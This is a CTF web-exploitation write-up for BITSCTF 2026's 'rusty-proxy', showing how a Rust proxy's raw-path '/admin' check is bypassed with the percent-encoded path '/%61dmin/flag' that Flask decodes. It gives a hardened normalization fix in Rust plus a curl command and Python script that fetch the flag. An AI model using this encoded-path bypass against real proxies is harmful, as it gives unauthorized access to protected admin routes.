BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup

Category: Web Exploitation

Flag: BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

Challenge Description

Rust reverse proxy with Flask backend. Remote: http://rusty-proxy.chals.bitskrieg.in:25001

Analysis

Proxy ACL in main.rs:

fn is_path_allowed(path: &str) -> bool {
    let normalized = path.to_lowercase();
    if normalized.starts_with("/admin") {
        return false;
    }
    true
}

The proxy checks the raw request path without URL decoding, so the prefix comparison runs on the percent-encoded string as sent. Flask, on the other hand, decodes %61 to a before routing, so the backend sees the decoded path.
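The fix is to canonicalize the path into the form the backend router will actually see before applying the deny rule. The following is an added example, not the challenge's own code: it keeps the original `is_path_allowed` for comparison and adds a hardened variant that strips the query string, percent-decodes once (matching Flask/WSGI, which decodes a single time), resolves `.` and `..` segments, collapses duplicate slashes, and fails closed on malformed escapes. The `percent_decode` helper is hand-rolled here so the example needs no external crates; a real proxy would use a well-tested URL library.

```rust
// Added example: hardened path ACL for a reverse proxy. Not the challenge's code.

/// Original (vulnerable) check from the challenge, kept for comparison:
/// it compares the raw, still-encoded path, so "/%61dmin" is not caught.
fn is_path_allowed(path: &str) -> bool {
    let normalized = path.to_lowercase();
    if normalized.starts_with("/admin") {
        return false;
    }
    true
}

/// Percent-decode a path once. Returns None on a malformed escape so the
/// caller can reject the request instead of guessing what the backend does.
fn percent_decode(input: &str) -> Option<String> {
    let bytes = input.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' {
            // Need two more bytes for a complete %XX escape.
            if i + 2 >= bytes.len() {
                return None;
            }
            let hi = (bytes[i + 1] as char).to_digit(16)?;
            let lo = (bytes[i + 2] as char).to_digit(16)?;
            out.push((hi * 16 + lo) as u8);
            i += 3;
        } else {
            out.push(bytes[i]);
            i += 1;
        }
    }
    String::from_utf8(out).ok()
}

/// Normalize a request path into the form the backend router will see:
/// drop the query/fragment, decode once, resolve "." and "..", and collapse
/// empty segments produced by repeated slashes.
fn normalize_path(raw: &str) -> Option<String> {
    let path_only = raw.split(|c: char| c == '?' || c == '#').next().unwrap_or("");
    let decoded = percent_decode(path_only)?;
    let mut segments: Vec<&str> = Vec::new();
    for seg in decoded.split('/') {
        match seg {
            "" | "." => {}
            ".." => {
                segments.pop();
            }
            s => segments.push(s),
        }
    }
    Some(format!("/{}", segments.join("/")))
}

/// Hardened ACL: apply the same "/admin" prefix rule as the original, but on
/// the normalized path. Anything that fails to normalize is denied.
fn is_path_allowed_hardened(path: &str) -> bool {
    match normalize_path(path) {
        None => false,
        Some(p) => !p.to_lowercase().starts_with("/admin"),
    }
}

fn main() {
    // Constructed sample paths to show the difference between the two checks.
    for p in ["/admin/flag", "/%61dmin/flag", "//admin/flag", "/api/users"] {
        println!(
            "{:<16} original={:<5} hardened={}",
            p,
            is_path_allowed(p),
            is_path_allowed_hardened(p)
        );
    }
}
```

The number of decode passes must match the backend exactly: decoding more times than the backend would let a proxy accept `%2561dmin` as harmless while the backend also treats it as harmless, but decoding fewer times than the backend is precisely the bug in this challenge. The safest design avoids the comparison altogether by having the proxy, not the backend, own the admin routes, or by authenticating admin requests at the backend too rather than trusting the proxy's filter.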

Exploitation

curl "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

/%61dmin/flag passes proxy check (doesn’t start with /admin), but Flask receives /admin/flag.

Or using Python:

#!/usr/bin/env python3
# Request the flag through the proxy with the percent-encoded path: the proxy's
# raw-path prefix check does not match, while Flask decodes it to /admin/flag.
import requests

URL = "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

r = requests.get(URL, timeout=10)
r.raise_for_status()
data = r.json()
print(f"Flag: {data.get('flag')}")
Source: https://fuwari.vercel.app/posts/49/bitsctf-2026-rusty-proxy-web-exploitation-writeup/
Author: Light
Published at: 2026-02-22
License: CC BY-NC-SA 4.0